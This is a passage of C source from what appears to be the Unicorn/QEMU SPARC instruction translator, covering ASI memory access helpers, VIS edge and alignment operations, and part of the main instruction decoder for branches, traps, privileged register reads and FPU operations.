t64, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); tcg_temp_free_i64(tcg_ctx, t64); } break; } } static void gen_casx_asi(DisasContext *dc, TCGv addr, TCGv cmpv, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv oldv; switch (da.type) { case GET_ASI_EXCP: return; case GET_ASI_DIRECT: oldv = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, addr, cmpv, gen_load_gpr(dc, rd), da.mem_idx, da.memop); gen_store_gpr(dc, rd, oldv); tcg_temp_free(tcg_ctx, oldv); break; default: /* ??? Should be DAE_invalid_asi. */ gen_exception(dc, TT_DATA_ACCESS); break; } } #else static void gen_ldda_asi(DisasContext *dc, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* ??? Work around an apparent bug in Ubuntu gcc 4.8.2-10ubuntu2+12, whereby "rd + 1" elicits "error: array subscript is above array". Since we have already asserted that rd is even, the semantics are unchanged. */ TCGv lo = gen_dest_gpr(dc, rd | 1); TCGv hi = gen_dest_gpr(dc, rd); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); DisasASI da = get_asi(dc, insn, MO_TEQ); switch (da.type) { case GET_ASI_EXCP: tcg_temp_free_i64(tcg_ctx, t64); return; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_ld_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_Q); save_state(dc); gen_helper_ld_asi(tcg_ctx, t64, tcg_ctx->cpu_env, addr, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } tcg_gen_extr_i64_i32(tcg_ctx, lo, hi, t64); tcg_temp_free_i64(tcg_ctx, t64); gen_store_gpr(dc, rd | 1, lo); gen_store_gpr(dc, rd, hi); } static void gen_stda_asi(DisasContext *dc, TCGv hi, TCGv addr, int insn, int rd) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; DisasASI da = get_asi(dc, insn, MO_TEQ); TCGv lo = gen_load_gpr(dc, rd + 1); TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, hi); switch (da.type) { case GET_ASI_EXCP: break; case GET_ASI_DIRECT: gen_address_mask(dc, addr); tcg_gen_qemu_st_i64(tcg_ctx, t64, addr, da.mem_idx, da.memop); break; case GET_ASI_BFILL: /* Store 32 bytes of T64 to ADDR. */ /* ??? The original qemu code suggests 8-byte alignment, dropping the low bits, but the only place I can see this used is in the Linux kernel with 32 byte alignment, which would make more sense as a cacheline-style operation. */ { TCGv d_addr = tcg_temp_new(tcg_ctx); TCGv eight = tcg_const_tl(tcg_ctx, 8); int i; tcg_gen_andi_tl(tcg_ctx, d_addr, addr, -8); for (i = 0; i < 32; i += 8) { tcg_gen_qemu_st_i64(tcg_ctx, t64, d_addr, da.mem_idx, da.memop); tcg_gen_add_tl(tcg_ctx, d_addr, d_addr, eight); } tcg_temp_free(tcg_ctx, d_addr); tcg_temp_free(tcg_ctx, eight); } break; default: { TCGv_i32 r_asi = tcg_const_i32(tcg_ctx, da.asi); TCGv_i32 r_mop = tcg_const_i32(tcg_ctx, MO_Q); save_state(dc); gen_helper_st_asi(tcg_ctx, tcg_ctx->cpu_env, addr, t64, r_asi, r_mop); tcg_temp_free_i32(tcg_ctx, r_mop); tcg_temp_free_i32(tcg_ctx, r_asi); } break; } tcg_temp_free_i64(tcg_ctx, t64); } #endif static TCGv get_src1(DisasContext *dc, unsigned int insn) { unsigned int rs1 = GET_FIELD(insn, 13, 17); return gen_load_gpr(dc, rs1); } static TCGv get_src2(DisasContext *dc, unsigned int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (IS_IMM) { /* immediate */ target_long simm = GET_FIELDs(insn, 19, 31); TCGv t = get_temp_tl(dc); tcg_gen_movi_tl(tcg_ctx, t, simm); return t; } else { /* register */ unsigned int rs2 = GET_FIELD(insn, 27, 31); return gen_load_gpr(dc, rs2); } } #ifdef TARGET_SPARC64 static void gen_fmovs(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 c32, zero, dst, s1, s2; /* We have two choices here: extend the 32 bit data and use movcond_i64, or fold the comparison down to 32 bits and use movcond_i32. Choose the later. */ c32 = tcg_temp_new_i32(tcg_ctx); if (cmp->is_bool) { tcg_gen_extrl_i64_i32(tcg_ctx, c32, cmp->c1); } else { TCGv_i64 c64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, cmp->cond, c64, cmp->c1, cmp->c2); tcg_gen_extrl_i64_i32(tcg_ctx, c32, c64); tcg_temp_free_i64(tcg_ctx, c64); } s1 = gen_load_fpr_F(dc, rs); s2 = gen_load_fpr_F(dc, rd); dst = gen_dest_fpr_F(dc); zero = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dst, c32, zero, s1, s2); tcg_temp_free_i32(tcg_ctx, c32); tcg_temp_free_i32(tcg_ctx, zero); gen_store_fpr_F(dc, rd, dst); } static void gen_fmovd(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i64 dst = gen_dest_fpr_D(dc, rd); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, dst, cmp->c1, cmp->c2, gen_load_fpr_D(dc, rs), gen_load_fpr_D(dc, rd)); gen_store_fpr_D(dc, rd, dst); } static void gen_fmovq(DisasContext *dc, DisasCompare *cmp, int rd, int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; int qd = QFPREG(rd); int qs = QFPREG(rs); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2], cmp->c1, cmp->c2, tcg_ctx->cpu_fpr[qs / 2], tcg_ctx->cpu_fpr[qd / 2]); tcg_gen_movcond_i64(tcg_ctx, cmp->cond, tcg_ctx->cpu_fpr[qd / 2 + 1], cmp->c1, cmp->c2, tcg_ctx->cpu_fpr[qs / 2 + 1], tcg_ctx->cpu_fpr[qd / 2 + 1]); gen_update_fprs_dirty(dc, qd); } static inline void gen_load_trap_state_at_tl(TCGContext *tcg_ctx, TCGv_ptr r_tsptr, TCGv_env cpu_env) { TCGv_i32 r_tl = tcg_temp_new_i32(tcg_ctx); /* load env->tl into r_tl */ tcg_gen_ld_i32(tcg_ctx, r_tl, cpu_env, offsetof(CPUSPARCState, tl)); /* tl = [0 ... MAXTL_MASK] where MAXTL_MASK must be power of 2 */ tcg_gen_andi_i32(tcg_ctx, r_tl, r_tl, MAXTL_MASK); /* calculate offset to current trap state from env->ts, reuse r_tl */ tcg_gen_muli_i32(tcg_ctx, r_tl, r_tl, sizeof (trap_state)); tcg_gen_addi_ptr(tcg_ctx, r_tsptr, cpu_env, offsetof(CPUSPARCState, ts)); /* tsptr = env->ts[env->tl & MAXTL_MASK] */ { TCGv_ptr r_tl_tmp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ext_i32_ptr(tcg_ctx, r_tl_tmp, r_tl); tcg_gen_add_ptr(tcg_ctx, r_tsptr, r_tsptr, r_tl_tmp); tcg_temp_free_ptr(tcg_ctx, r_tl_tmp); } tcg_temp_free_i32(tcg_ctx, r_tl); } static void gen_edge(DisasContext *dc, TCGv dst, TCGv s1, TCGv s2, int width, bool cc, bool left) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv lo1, lo2, t1, t2; uint64_t amask, tabl, tabr; int shift, imask, omask; if (cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s2); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s1, s2); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUB); dc->cc_op = CC_OP_SUB; } /* Theory of operation: there are two tables, left and right (not to be confused with the left and right versions of the opcode). These are indexed by the low 3 bits of the inputs. To make things "easy", these tables are loaded into two constants, TABL and TABR below. The operation index = (input & imask) << shift calculates the index into the constant, while val = (table >> index) & omask calculates the value we're looking for. */ switch (width) { case 8: imask = 0x7; shift = 3; omask = 0xff; if (left) { tabl = 0x80c0e0f0f8fcfeffULL; tabr = 0xff7f3f1f0f070301ULL; } else { tabl = 0x0103070f1f3f7fffULL; tabr = 0xfffefcf8f0e0c080ULL; } break; case 16: imask = 0x6; shift = 1; omask = 0xf; if (left) { tabl = 0x8cef; tabr = 0xf731; } else { tabl = 0x137f; tabr = 0xfec8; } break; case 32: imask = 0x4; shift = 0; omask = 0x3; if (left) { tabl = (2 << 2) | 3; tabr = (3 << 2) | 1; } else { tabl = (1 << 2) | 3; tabr = (3 << 2) | 2; } break; default: abort(); } lo1 = tcg_temp_new(tcg_ctx); lo2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, lo1, s1, imask); tcg_gen_andi_tl(tcg_ctx, lo2, s2, imask); tcg_gen_shli_tl(tcg_ctx, lo1, lo1, shift); tcg_gen_shli_tl(tcg_ctx, lo2, lo2, shift); t1 = tcg_const_tl(tcg_ctx, tabl); t2 = tcg_const_tl(tcg_ctx, tabr); tcg_gen_shr_tl(tcg_ctx, lo1, t1, lo1); tcg_gen_shr_tl(tcg_ctx, lo2, t2, lo2); tcg_gen_andi_tl(tcg_ctx, dst, lo1, omask); tcg_gen_andi_tl(tcg_ctx, lo2, lo2, omask); amask = -8; if (AM_CHECK(dc)) { amask &= 0xffffffffULL; } tcg_gen_andi_tl(tcg_ctx, s1, s1, amask); tcg_gen_andi_tl(tcg_ctx, s2, s2, amask); /* We want to compute dst = (s1 == s2 ? lo1 : lo1 & lo2). We've already done dst = lo1, so this reduces to dst &= (s1 == s2 ? -1 : lo2) Which we perform by lo2 |= -(s1 == s2) dst &= lo2 */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_EQ, t1, s1, s2); tcg_gen_neg_tl(tcg_ctx, t1, t1); tcg_gen_or_tl(tcg_ctx, lo2, lo2, t1); tcg_gen_and_tl(tcg_ctx, dst, dst, lo2); tcg_temp_free(tcg_ctx, lo1); tcg_temp_free(tcg_ctx, lo2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_alignaddr(TCGContext *tcg_ctx, TCGv dst, TCGv s1, TCGv s2, bool left) { TCGv tmp = tcg_temp_new(tcg_ctx); tcg_gen_add_tl(tcg_ctx, tmp, s1, s2); tcg_gen_andi_tl(tcg_ctx, dst, tmp, -8); if (left) { tcg_gen_neg_tl(tcg_ctx, tmp, tmp); } tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gsr, tcg_ctx->cpu_gsr, tmp, 0, 3); tcg_temp_free(tcg_ctx, tmp); } static void gen_faligndata(TCGContext *tcg_ctx, TCGv dst, TCGv gsr, TCGv s1, TCGv s2) { TCGv t1, t2, shift; t1 = tcg_temp_new(tcg_ctx); t2 = tcg_temp_new(tcg_ctx); shift = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, shift, gsr, 7); tcg_gen_shli_tl(tcg_ctx, shift, shift, 3); tcg_gen_shl_tl(tcg_ctx, t1, s1, shift); /* A shift of 64 does not produce 0 in TCG. Divide this into a shift of (up to 63) followed by a constant shift of 1. */ tcg_gen_xori_tl(tcg_ctx, shift, shift, 63); tcg_gen_shr_tl(tcg_ctx, t2, s2, shift); tcg_gen_shri_tl(tcg_ctx, t2, t2, 1); tcg_gen_or_tl(tcg_ctx, dst, t1, t2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, shift); } #endif #define CHECK_IU_FEATURE(dc, FEATURE) \ if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ goto illegal_insn; #define CHECK_FPU_FEATURE(dc, FEATURE) \ if (!((dc)->def->features & CPU_FEATURE_ ## FEATURE)) \ goto nfpu_insn; /* before an instruction, dc->pc must be static */ static void disas_sparc_insn(DisasContext * dc, unsigned int insn) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; unsigned int opc, rs1, rs2, rd; TCGv cpu_src1, cpu_src2; TCGv_i32 cpu_src1_32, cpu_src2_32, cpu_dst_32; TCGv_i64 cpu_src1_64, cpu_src2_64, cpu_dst_64; target_long simm; opc = GET_FIELD(insn, 0, 1); rd = GET_FIELD(insn, 2, 6); switch (opc) { case 0: /* branches/sethi */ { unsigned int xop = GET_FIELD(insn, 7, 9); int32_t target; switch (xop) { #ifdef TARGET_SPARC64 case 0x1: /* V9 BPcc */ { int cc; target = GET_FIELD_SP(insn, 0, 18); target = sign_extend(target, 19); target <<= 2; cc = GET_FIELD_SP(insn, 20, 21); if (cc == 0) do_branch(dc, target, insn, 0); else if (cc == 2) do_branch(dc, target, insn, 1); else goto illegal_insn; goto jmp_insn; } case 0x3: /* V9 BPr */ { target = GET_FIELD_SP(insn, 0, 13) | (GET_FIELD_SP(insn, 20, 21) << 14); target = sign_extend(target, 16); target <<= 2; cpu_src1 = get_src1(dc, insn); do_branch_reg(dc, target, insn, cpu_src1); goto jmp_insn; } case 0x5: /* V9 FBPcc */ { int cc = GET_FIELD_SP(insn, 20, 21); if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } target = GET_FIELD_SP(insn, 0, 18); target = sign_extend(target, 19); target <<= 2; do_fbranch(dc, target, insn, cc); goto jmp_insn; } #else case 0x7: /* CBN+x */ { goto ncp_insn; } #endif case 0x2: /* BN+x */ { target = GET_FIELD(insn, 10, 31); target = sign_extend(target, 22); target <<= 2; do_branch(dc, target, insn, 0); goto jmp_insn; } case 0x6: /* FBN+x */ { if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } target = GET_FIELD(insn, 10, 31); target = sign_extend(target, 22); target <<= 2; do_fbranch(dc, target, insn, 0); goto jmp_insn; } case 0x4: /* SETHI */ /* Special-case %g0 because that's the canonical nop. */ if (rd) { uint32_t value = GET_FIELD(insn, 10, 31); TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, value << 10); gen_store_gpr(dc, rd, t); } break; case 0x0: /* UNIMPL */ default: goto illegal_insn; } break; } break; case 1: /*CALL*/ { target_long target = GET_FIELDs(insn, 2, 31) << 2; TCGv o7 = gen_dest_gpr(dc, 15); tcg_gen_movi_tl(tcg_ctx, o7, dc->pc); gen_store_gpr(dc, 15, o7); target += dc->pc; gen_mov_pc_npc(dc); #ifdef TARGET_SPARC64 if (unlikely(AM_CHECK(dc))) { target &= 0xffffffffULL; } #endif dc->npc = target; } goto jmp_insn; case 2: /* FPU & Logical Operations */ { unsigned int xop = GET_FIELD(insn, 7, 12); TCGv cpu_dst = get_temp_tl(dc); TCGv cpu_tmp0; if (xop == 0x3a) { /* generate trap */ int cond = GET_FIELD(insn, 3, 6); TCGv_i32 trap; TCGLabel *l1 = NULL; int mask; if (cond == 0) { /* Trap never. */ break; } save_state(dc); if (cond != 8) { /* Conditional trap. */ DisasCompare cmp; #ifdef TARGET_SPARC64 /* V9 icc/xcc */ int cc = GET_FIELD_SP(insn, 11, 12); if (cc == 0) { gen_compare(&cmp, 0, cond, dc); } else if (cc == 2) { gen_compare(&cmp, 1, cond, dc); } else { goto illegal_insn; } #else gen_compare(&cmp, 0, cond, dc); #endif l1 = gen_new_label(tcg_ctx); tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cmp.cond), cmp.c1, cmp.c2, l1); free_compare(tcg_ctx, &cmp); } mask = ((dc->def->features & CPU_FEATURE_HYPV) && supervisor(dc) ? UA2005_HTRAP_MASK : V8_TRAP_MASK); /* Don't use the normal temporaries, as they may well have gone out of scope with the branch above. While we're doing that we might as well pre-truncate to 32-bit. */ trap = tcg_temp_new_i32(tcg_ctx); rs1 = GET_FIELD_SP(insn, 14, 18); if (IS_IMM) { rs2 = GET_FIELD_SP(insn, 0, 7); if (rs1 == 0) { tcg_gen_movi_i32(tcg_ctx, trap, (rs2 & mask) + TT_TRAP); /* Signal that the trap value is fully constant. */ mask = 0; } else { TCGv t1 = gen_load_gpr(dc, rs1); tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); tcg_gen_addi_i32(tcg_ctx, trap, trap, rs2); } } else { TCGv t1, t2; rs2 = GET_FIELD_SP(insn, 0, 4); t1 = gen_load_gpr(dc, rs1); t2 = gen_load_gpr(dc, rs2); tcg_gen_add_tl(tcg_ctx, t1, t1, t2); tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); } if (mask != 0) { tcg_gen_andi_i32(tcg_ctx, trap, trap, mask); tcg_gen_addi_i32(tcg_ctx, trap, trap, TT_TRAP); } gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, trap); tcg_temp_free_i32(tcg_ctx, trap); if (cond == 8) { /* An unconditional trap ends the TB. */ dc->base.is_jmp = DISAS_NORETURN; goto jmp_insn; } else { /* A conditional trap falls through to the next insn. */ gen_set_label(tcg_ctx, l1); break; } } else if (xop == 0x28) { rs1 = GET_FIELD(insn, 13, 17); switch(rs1) { case 0: /* rdy */ #ifndef TARGET_SPARC64 case 0x01: /* undefined in the SPARCv8 manual, rdy on the microSPARC II */ case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: case 0x0f: /* stbar in the SPARCv8 manual, rdy on the microSPARC II */ case 0x10: /* implementation-dependent in the SPARCv8 manual, rdy on the microSPARC II */ case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: /* Read Asr17 */ if (rs1 == 0x11 && dc->def->features & CPU_FEATURE_ASR17) { TCGv t = gen_dest_gpr(dc, rd); /* Read Asr17 for a Leon3 monoprocessor */ tcg_gen_movi_tl(tcg_ctx, t, (1 << 8) | (dc->def->nwindows - 1)); gen_store_gpr(dc, rd, t); break; } #endif gen_store_gpr(dc, rd, tcg_ctx->cpu_y); break; #ifdef TARGET_SPARC64 case 0x2: /* V9 rdccr */ update_psr(dc); gen_helper_rdccr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); gen_store_gpr(dc, rd, cpu_dst); break; case 0x3: /* V9 rdasi */ tcg_gen_movi_tl(tcg_ctx, cpu_dst, dc->asi); gen_store_gpr(dc, rd, cpu_dst); break; case 0x4: /* V9 rdtick */ { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); gen_store_gpr(dc, rd, cpu_dst); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 0x5: /* V9 rdpc */ { TCGv t = gen_dest_gpr(dc, rd); if (unlikely(AM_CHECK(dc))) { tcg_gen_movi_tl(tcg_ctx, t, dc->pc & 0xffffffffULL); } else { tcg_gen_movi_tl(tcg_ctx, t, dc->pc); } gen_store_gpr(dc, rd, t); } break; case 0x6: /* V9 rdfprs */ tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_fprs); gen_store_gpr(dc, rd, cpu_dst); break; case 0xf: /* V9 membar */ break; /* no effect */ case 0x13: /* Graphics Status */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_store_gpr(dc, rd, tcg_ctx->cpu_gsr); break; case 0x16: /* Softint */ tcg_gen_ld32s_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, offsetof(CPUSPARCState, softint)); gen_store_gpr(dc, rd, cpu_dst); break; case 0x17: /* Tick compare */ gen_store_gpr(dc, rd, tcg_ctx->cpu_tick_cmpr); break; case 0x18: /* System tick */ { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, stick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); gen_store_gpr(dc, rd, cpu_dst); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 0x19: /* System tick compare */ gen_store_gpr(dc, rd, tcg_ctx->cpu_stick_cmpr); break; case 0x1a: /* UltraSPARC-T1 Strand status */ /* XXX HYPV check maybe not enough, UA2005 & UA2007 describe * this ASR as impl. dep */ CHECK_IU_FEATURE(dc, HYPV); { TCGv t = gen_dest_gpr(dc, rd); tcg_gen_movi_tl(tcg_ctx, t, 1UL); gen_store_gpr(dc, rd, t); } break; case 0x10: /* Performance Control */ case 0x11: /* Performance Instrumentation Counter */ case 0x12: /* Dispatch Control */ case 0x14: /* Softint set, WO */ case 0x15: /* Softint clear, WO */ #endif default: goto illegal_insn; } } else if (xop == 0x29) { /* rdpsr / UA2005 rdhpr */ #ifndef TARGET_SPARC64 if (!supervisor(dc)) { goto priv_insn; } update_psr(dc); gen_helper_rdpsr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); #else CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; rs1 = GET_FIELD(insn, 13, 17); switch (rs1) { case 0: // hpstate tcg_gen_ld_i64(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, offsetof(CPUSPARCState, hpstate)); break; case 1: // htstate // gen_op_rdhtstate(); break; case 3: // hintp tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hintp); break; case 5: // htba tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_htba); break; case 6: // hver tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hver); break; case 31: // hstick_cmpr tcg_gen_mov_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_hstick_cmpr); break; default: goto illegal_insn; } #endif gen_store_gpr(dc, rd, cpu_dst); break; } else if (xop == 0x2a) { /* rdwim / V9 rdpr */ if (!supervisor(dc)) { goto priv_insn; } cpu_tmp0 = get_temp_tl(dc); #ifdef TARGET_SPARC64 rs1 = GET_FIELD(insn, 13, 17); switch (rs1) { case 0: // tpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 1: // tnpc { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tnpc)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 2: // tstate { TCGv_ptr r_tsptr; r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tstate)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 3: // tt { TCGv_ptr r_tsptr = tcg_temp_new_ptr(tcg_ctx); gen_load_trap_state_at_tl(tcg_ctx, r_tsptr, tcg_ctx->cpu_env); tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, r_tsptr, offsetof(trap_state, tt)); tcg_temp_free_ptr(tcg_ctx, r_tsptr); } break; case 4: // tick { TCGv_ptr r_tickptr; TCGv_i32 r_const; r_tickptr = tcg_temp_new_ptr(tcg_ctx); r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tick)); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_start(); } gen_helper_tick_get_count(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, r_tickptr, r_const); tcg_temp_free_ptr(tcg_ctx, r_tickptr); tcg_temp_free_i32(tcg_ctx, r_const); if (tb_cflags(dc->base.tb) & CF_USE_ICOUNT) { // gen_io_end(); } } break; case 5: // tba tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_tbr); break; case 6: // pstate tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, pstate)); break; case 7: // tl tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, tl)); break; case 8: // pil tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, psrpil)); break; case 9: // cwp gen_helper_rdcwp(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env); break; case 10: // cansave tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cansave)); break; case 11: // canrestore tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, canrestore)); break; case 12: // cleanwin tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, cleanwin)); break; case 13: // otherwin tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, otherwin)); break; case 14: // wstate tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, wstate)); break; case 16: // UA2005 gl CHECK_IU_FEATURE(dc, GL); tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, offsetof(CPUSPARCState, gl)); break; case 26: // UA2005 strand status CHECK_IU_FEATURE(dc, HYPV); if (!hypervisor(dc)) goto priv_insn; tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_ssr); break; case 31: // ver tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_ver); break; case 15: // fq default: goto illegal_insn; } #else tcg_gen_ext_i32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_wim); #endif gen_store_gpr(dc, rd, cpu_tmp0); break; } else if (xop == 0x2b) { /* rdtbr / V9 flushw */ #ifdef TARGET_SPARC64 gen_helper_flushw(tcg_ctx, tcg_ctx->cpu_env); #else if (!supervisor(dc)) goto priv_insn; gen_store_gpr(dc, rd, tcg_ctx->cpu_tbr); #endif break; } else if (xop == 0x34) { /* FPU Operations */ if (gen_trap_ifnofpu(dc)) { goto jmp_insn; } gen_op_clear_ieee_excp_and_FTT(tcg_ctx); rs1 = GET_FIELD(insn, 13, 17); rs2 = GET_FIELD(insn, 27, 31); xop = GET_FIELD(insn, 18, 26); switch (xop) { case 0x1: /* fmovs */ cpu_src1_32 = gen_load_fpr_F(dc, rs2); gen_store_fpr_F(dc, rd, cpu_src1_32); break; case 0x5: /* fnegs */ gen_ne_fop_FF(dc, rd, rs2, gen_helper_fnegs); break; case 0x9: /* fabss */ gen_ne_fop_FF(dc, rd, rs2, gen_helper_fabss); break; case 0x29: /* fsqrts */ CHECK_FPU_FEATURE(dc, FSQRT); gen_fop_FF(dc, rd, rs2, gen_helper_fsqrts); break; case 0x2a: /* fsqrtd */ CHECK_FPU_FEATURE(dc, FSQRT); gen_fop_DD(dc, rd, rs2, gen_helper_fsqrtd); break; case 0x2b: /* fsqrtq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQ(dc, rd, rs2, gen_helper_fsqrtq); break; case 0x41: /* fadds */ gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fadds); break; case 0x42: /* faddd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_faddd); break; case 0x43: /* faddq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_faddq); break; case 0x45: /* fsubs */ gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fsubs); break; case 0x46: /* fsubd */ gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fsubd); break; case 0x47: /* fsubq */ CHECK_FPU_FEATURE(dc, FLOAT128); gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fsubq); break; case 0x49: /* fmuls */ CHECK_FPU_FEATURE(dc, FMUL); gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fmuls); break; case 